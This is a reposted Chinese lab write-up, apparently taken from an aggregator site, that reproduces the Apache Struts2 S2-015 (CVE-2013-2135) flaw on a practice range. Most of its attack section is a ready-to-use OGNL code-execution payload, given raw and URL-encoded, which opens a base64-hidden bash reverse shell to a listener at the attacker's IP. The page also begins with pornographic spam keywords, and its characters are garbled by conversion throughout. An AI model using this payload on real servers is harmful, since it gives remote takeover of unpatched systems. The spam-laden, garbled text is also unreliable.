国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

[漏洞復(fù)現(xiàn)]Apache Struts2/S2-015 (CVE-2013-2135)

這篇具有很好參考價(jià)值的文章主要介紹了[漏洞復(fù)現(xiàn)]Apache Struts2/S2-015 (CVE-2013-2135)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

一、漏洞情況分析

2.3.14.3 之前的 Apache Struts 2 允許遠(yuǎn)程攻擊者通過一個(gè)包含“${}”和“%{}”序列的特制值的請求執(zhí)行任意 OGNL 代碼,這會導(dǎo)致 OGNL 代碼被評估兩次。

二、漏洞復(fù)現(xiàn)

春秋云境.com

[漏洞復(fù)現(xiàn)]Apache Struts2/S2-015 (CVE-2013-2135),Struts,春秋云境靶場,apache,struts,java,web安全,安全

進(jìn)入靶場

[漏洞復(fù)現(xiàn)]Apache Struts2/S2-015 (CVE-2013-2135),Struts,春秋云境靶場,apache,struts,java,web安全,安全

開始復(fù)現(xiàn)

構(gòu)造好payload,彈nc

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}').getInputStream()),#q}.action

就構(gòu)造好的payload,url編碼

%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField(%27allowStaticMethodAccess%27)%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27).getInputStream())%2C%23q%7D.action

接入我們的ip后面,同時(shí)本地打開nc監(jiān)聽

[漏洞復(fù)現(xiàn)]Apache Struts2/S2-015 (CVE-2013-2135),Struts,春秋云境靶場,apache,struts,java,web安全,安全

[漏洞復(fù)現(xiàn)]Apache Struts2/S2-015 (CVE-2013-2135),Struts,春秋云境靶場,apache,struts,java,web安全,安全

三、漏洞處置建議?

把靶場關(guān)了,跟漏洞說“白白吧文章來源地址http://www.zghlxwxcb.cn/news/detail-824382.html

到了這里,關(guān)于[漏洞復(fù)現(xiàn)]Apache Struts2/S2-015 (CVE-2013-2135)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • struts2 s2-062 OGNL遠(yuǎn)程代碼執(zhí)行

    struts2是一種重量級的框架,位于MVC架構(gòu)中的controller,可以分析出來,它是用于接受頁面信息然后通過內(nèi)部處理,將結(jié)果返回。struts2也是一個(gè)web層的MVC框架。 Java中SSH框架 SSH為Struts+Spring+Hibernate的一個(gè)集成框架,是目前較流行的一種JAVA Web應(yīng)用程序開源框架。 Java中SSM框架 SS

    2024年02月02日
    瀏覽(28)
  • 框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn)

    框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等 1、開發(fā)框架-PHP-Laravel-Thinkphp 2、開發(fā)框架-Javaweb-St2-Spring 3、開發(fā)框架-Python-django-Flask 4、開發(fā)框架-Javascript-Nod

    2024年02月08日
    瀏覽(23)
  • struts2漏洞

    struts2漏洞

    漏洞原理 該漏洞因用戶提交表單數(shù)據(jù)并且驗(yàn)證失敗時(shí),后端會將用戶之前提交的參數(shù)值使用OGNL表達(dá)式%{value}進(jìn)行解析,然后重新填充到對應(yīng)的表單數(shù)據(jù)中。如注冊或登錄頁面,提交失敗后一般會默認(rèn)返回之前提交的數(shù)據(jù),由于后端使用%{value}對提交的數(shù)據(jù)執(zhí)行了一次OGNL 表達(dá)

    2024年02月06日
    瀏覽(22)
  • Struts2 漏洞集合

    總結(jié)了一部分 Strtus2 漏洞,雖然現(xiàn)在這部分的漏洞很少了,但也是學(xué)習(xí)的一部分,收集的并不全面,后續(xù)會做補(bǔ)充。 漏洞環(huán)境搭建可以使用在線的 Vulfocus ,或者使用docker部署 S2-001 (CVE-2007-4556) 該漏洞因?yàn)橛脩籼峤槐韱螖?shù)據(jù)并且驗(yàn)證失敗時(shí),后端會將用戶之前提交的參數(shù)值

    2024年02月16日
    瀏覽(26)
  • 【滲透測試】Struts2系列漏洞

    【滲透測試】Struts2系列漏洞

    ??S2-001 ??1、漏洞原理 ??2、影響版本 ??3、驗(yàn)證方法 ??S2-005 ??1、漏洞原理 ??2、影響版本 ??3、驗(yàn)證方法(無回顯) ??4、驗(yàn)證方法(有回顯) ??S2-007 ??1、漏洞原理 ??2、影響版本 ??3、漏洞驗(yàn)證 ??S2-008 ??1、漏洞原理 ??2、影響版本 ??3、漏洞驗(yàn)證 ??S2-009 ??

    2023年04月09日
    瀏覽(22)
  • 框架安全-CVE 復(fù)現(xiàn)&Apache Shiro&Apache Solr漏洞復(fù)現(xiàn)

    框架安全-CVE 復(fù)現(xiàn)&Apache Shiro&Apache Solr漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等 1、開發(fā)框架-PHP-Laravel-Thinkphp 2、開發(fā)框架-Javaweb-St2-Spring 3、開發(fā)框架-Python-django-Flask 4、開發(fā)框架-Javascript-Nod

    2024年02月05日
    瀏覽(48)
  • 框架漏洞-CVE復(fù)現(xiàn)-Apache Shiro+Apache Solr

    框架漏洞-CVE復(fù)現(xiàn)-Apache Shiro+Apache Solr

    什么是框架? ?????? 就是別人寫好包裝起來的一套工具,把你原先必須要寫的,必須要做的一些復(fù)雜的東西都寫好了放在那里,你只要調(diào)用他的方法,就可以實(shí)現(xiàn)一些本來要費(fèi)好大勁的功能。 ???????? 如果網(wǎng)站的功能是采用框架開發(fā)的,那么挖掘功能的漏洞就相當(dāng)于

    2024年02月16日
    瀏覽(19)
  • 漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    0x00 漏洞描述 ????????Apache Shiro 是一套用于執(zhí)行認(rèn)證、授權(quán)、加密和會話管理的 Java 安全框架。2022年06月29日 APache 官方發(fā)布了一則關(guān)于 Apache Shiro 的安全通告,Apache Shiro 1.9.1 前的版本 RegExPatternMatcher 在使用帶有 “.” 的正則時(shí),可能會導(dǎo)致權(quán)限繞過。漏洞源于 RegExPatter

    2024年02月02日
    瀏覽(36)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)復(fù)現(xiàn)

    Apache Tomcat 安全漏洞(CVE-2020-13935)復(fù)現(xiàn)

    漏洞詳情: Apache Tomcat是美國阿帕奇(Apache)軟件基金會的一款輕量級Web應(yīng)用服務(wù)器。該程序?qū)崿F(xiàn)了對Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,該漏洞源于程序沒有正確驗(yàn)證payload的長度。攻擊者可利用該漏洞造成拒絕服務(wù)(無限循環(huán))。 影響版

    2024年02月11日
    瀏覽(20)
  • 漏洞復(fù)現(xiàn):Apache Spark 命令注入(CVE-2022-33891)

    漏洞復(fù)現(xiàn):Apache Spark 命令注入(CVE-2022-33891)

    ? Apache Spark 是專為大規(guī)模數(shù)據(jù)處理而設(shè)計(jì)的快速通用的計(jì)算引擎。Spark是UC Berkeley AMP lab (加州大學(xué)伯克利分校的AMP實(shí)驗(yàn)室)所開源的類Hadoop MapReduce的通用并行框架,Spark,擁有Hadoop MapReduce所具有的優(yōu)點(diǎn);但不同于MapReduce的是——Job中間輸出結(jié)果可以保存在內(nèi)存中,從而不再需

    2024年02月09日
    瀏覽(17)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包